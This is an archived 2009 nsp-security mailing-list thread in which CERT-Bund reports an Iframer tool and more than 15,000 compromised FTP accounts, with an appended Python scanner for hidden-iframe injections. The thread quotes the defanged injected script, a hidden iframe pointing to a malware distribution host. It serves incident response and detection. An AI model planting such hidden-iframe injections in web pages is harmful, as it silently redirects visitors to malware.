[nsp-sec] ACK: Compromised ftp accounts
Rodolfo Baader
rbaader at arcert.gov.ar
Wed Aug 26 14:59:56 EDT 2009
Hi!
ACK for AR <CC> (ASNs and/or IPs).
R.
Thomas Hungenberg wrote:
> ----------- nsp-security Confidential --------
>
>
>
> ------------------------------------------------------------------------
>
>
> The gzip'ed attachment did not make it to the list, so I'm sending the list
> again uncompressed.
>
>
> - Thomas
>
> CERT-Bund Incident Response & Anti-Malware Team
>
>
> Thomas Hungenberg wrote:
>> Hi teams,
>>
>> I've come across an Iframer installation along with a list of 15.000+ ftp credentials.
>>
>> The Iframer tool most probably recently tried to inject this line (remove 'XXX'):
>> <scrXXXipt>document.write(\'<ifrXXXame src=\"htXXXtp://sexyy.ru/tds/go.php?sid=1\" width=\"0\" height=\"0\" style=\"display:none;visibility:hidden;\"></ifrXXXame>\');</scrXXXipt>
>>
>> Please find attached a sanitized list (pw removed) of the compromised ftp accounts.
>> Format: ASN | IP | CC | ftp username | AS name
>>
>> Top 10 country codes:
>>
>> 5240 US
>> 1263 RU
>> 1187 DE
>> 882 EU
>> 803 TR
>> 720 CZ
>> 674 FR
>> 655 PL
>> 564 HU
>> 475 NL
>>
>>
>> - Thomas
>>
>> CERT-Bund Incident Response & Anti-Malware Team
>>
>
>
> ------------------------------------------------------------------------
>
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
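A defensive check for the kind of injected line quoted above, as an added example that is not part of the original thread: it flags script blocks that use document.write to emit a zero-size or hidden iframe and reports the iframe host. The function names, the file extensions scanned and the sample page (with an example.invalid host) are constructed for illustration.

```python
import os
import re
from urllib.parse import urlparse

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I | re.S)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(["'])(.*?)\2""", re.S)

def hidden_iframe_hosts(html):
    """Hosts of iframes that a script emits via document.write and hides."""
    hosts = []
    for body in SCRIPT_RE.findall(html):
        if "document.write" not in body:
            continue
        # Undo JavaScript string escaping (\' and \") so attributes parse.
        body = body.replace("\\'", "'").replace('\\"', '"')
        for raw_attrs in IFRAME_RE.findall(body):
            attrs = {k.lower(): v.strip() for k, _, v in ATTR_RE.findall(raw_attrs)}
            style = attrs.get("style", "").lower().replace(" ", "")
            zero = (attrs.get("width") in ("0", "0px")
                    and attrs.get("height") in ("0", "0px"))
            hidden = "display:none" in style or "visibility:hidden" in style
            if zero or hidden:
                hosts.append(urlparse(attrs.get("src", "")).hostname or "(no src)")
    return hosts

def scan_tree(root):
    """Map file path -> flagged hosts for web files under root (e.g. an FTP docroot)."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith((".html", ".htm", ".php")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = hidden_iframe_hosts(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed sample: one legitimate visible iframe, one injected hidden one.
SAMPLE = r"""<html><body><h1>Welcome</h1>
<iframe src="https://maps.example.org/embed" width="400" height="300"></iframe>
<script>document.write(\'<iframe src=\"http://injected.example.invalid/go.php?sid=1\" width=\"0\" height=\"0\" style=\"display:none;visibility:hidden;\"></iframe>\');</script>
</body></html>"""

if __name__ == "__main__":
    print(hidden_iframe_hosts(SAMPLE))
```

Files that were flagged should be compared against a known-good copy, and the FTP password for the affected account changed before the cleaned file is uploaded again.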